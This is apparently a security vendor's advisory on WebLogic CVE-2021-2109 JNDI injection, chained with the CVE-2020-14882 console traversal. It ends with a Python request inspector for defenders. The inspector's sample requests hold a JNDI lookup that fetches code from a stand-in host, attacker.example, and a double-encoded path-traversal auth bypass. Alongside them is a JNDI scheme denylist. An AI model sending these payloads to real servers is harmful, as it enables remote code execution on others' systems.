Oracle recently published its quarterly Critical Patch Update advisory. One of the fixes it contains addresses CVE-2021-2109, which affects Oracle WebLogic Server.
The vulnerability allows an authenticated user to abuse the "JndiBinding" handler of the administration console and trigger a JNDI (Java Naming and Directory Interface) lookup against a server the attacker controls. The lookup fetches a malicious class (or serialized object) from that server; loading and deserializing it results in arbitrary code execution on the WebLogic server.
A day after the patch was released, a proof of concept was published by a researcher from the Alibaba Cloud security research group who had originally reported the vulnerability to Oracle.
Remote code execution vulnerabilities in WebLogic servers usually capture the attention of threat actors quickly; they rapidly add such bugs to their arsenal and integrate them into their operations.
The vulnerability can be exploited using a single HTTP Request:
Figure 1: Proof of concept HTTP request exploit for CVE-2021-2109
This vulnerability requires the attacker to be authenticated first. That hurdle can be removed by combining it with the path traversal used in the earlier unauthenticated remote code execution in the WebLogic console (CVE-2020-14882), which bypasses the console's authentication. Proof-of-concept exploits that chain the two are already public:
Figure 2: Proof of concept exploit combining CVE-2021-2109 and CVE-2020-14882
Mitigation with BIG-IP Advanced WAF (Attack Signatures and Threat Campaigns)
Advanced WAF customers on any supported version can be protected by the newly released attack signature 200104674 (Oracle WebLogic Console JNDI Injection), which is found under the Server-Side Code Injection attack type.
Figure 3: Exploit attempt blocked by signature id 200104674
Customers with a Threat Campaigns subscription are also protected by the newly released "Oracle WebLogic Console JndiBindingHandler RCE" Threat Campaign.
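To make the two detection points concrete (a JNDI URL submitted to a console handler, as in Figure 1, and the double-encoded console path traversal used to reach it unauthenticated, as in Figure 2), here is a small request inspector in Python. It is an added illustration, not F5's signature or Threat Campaign logic and not Oracle's code. It assumes a denylist of JNDI provider URL schemes, assumes the traversal takes the publicly reported `%252e%252e%252f` double-encoded form, and uses placeholder parameter names (`action`, `target`) in constructed sample requests rather than the real handler's parameters.

```python
import re
from urllib.parse import parse_qsl, unquote

# JNDI provider URL schemes whose lookup can pull a remote object or class from
# an attacker-controlled naming service. Assumption: a denylist of the common
# providers is enough for a console request; tune it to the deployment.
JNDI_SCHEMES = ("ldap", "ldaps", "rmi", "iiop", "iiopname", "corbaname", "dns", "nis")
JNDI_URL_RE = re.compile(r"\b(?:%s):/{2}[^\s\"'<>]+" % "|".join(JNDI_SCHEMES), re.IGNORECASE)

CONSOLE_PREFIX = "/console/"


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads (%252e -> %2e -> .) are seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(method: str, target: str, body: str = "") -> list:
    """Return (finding, detail) pairs for one HTTP request line plus form body."""
    findings = []
    raw_path, _, query = target.partition("?")
    path = fully_decode(raw_path)
    in_console = path.lower().startswith(CONSOLE_PREFIX)

    # 1. Authentication bypass: dot-segment traversal inside the console path
    #    (the CVE-2020-14882 pattern, checked after full decoding).
    if in_console and "../" in path.replace("\\", "/"):
        findings.append(("console_path_traversal", raw_path))

    # 2. JNDI injection: a JNDI URL in any query or body parameter of a console request.
    if in_console:
        params = parse_qsl(query, keep_blank_values=True)
        if method.upper() == "POST":
            params += parse_qsl(body, keep_blank_values=True)
        for name, value in params:
            match = JNDI_URL_RE.search(fully_decode(value))
            if match:
                findings.append(("jndi_lookup", f"{name}={match.group(0)}"))
    return findings


def should_block(findings) -> bool:
    """Either finding alone is enough to block: traversal bypasses auth, JNDI URL is the RCE."""
    return bool(findings)


# Constructed sample requests (not captured traffic); parameter names are placeholders.
SAMPLES = [
    # authenticated JNDI injection in a single request (Figure 1 shape)
    ("POST", "/console/console.portal?_nfpb=true",
     "action=bind&target=ldap%3A%2F%2Fattacker.example%3A1389%2FExploit"),
    # same payload chained with the double-encoded traversal that bypasses console auth (Figure 2 shape)
    ("GET", "/console/css/%252e%252e%252fconsole.portal?_nfpb=true&target=ldap://attacker.example:1389/Exploit", ""),
    # benign console page load
    ("GET", "/console/console.portal?_nfpb=true&_pageLabel=HomePage1", ""),
    # an http:// URL elsewhere in the application is not a JNDI lookup
    ("POST", "/app/save", "link=http://intranet.example/doc"),
]

if __name__ == "__main__":
    for method, target, body in SAMPLES:
        found = inspect_request(method, target, body)
        print(method, target, "->", "BLOCK" if should_block(found) else "allow", found)
```

The decode loop is the part worth copying: a single percent-decode pass sees `%2e%2e%2f`, not `../`, which is exactly why the console's own path check was bypassed. Matching the JNDI URL only after full decoding also catches the payload whether it arrives in the query string or a form body.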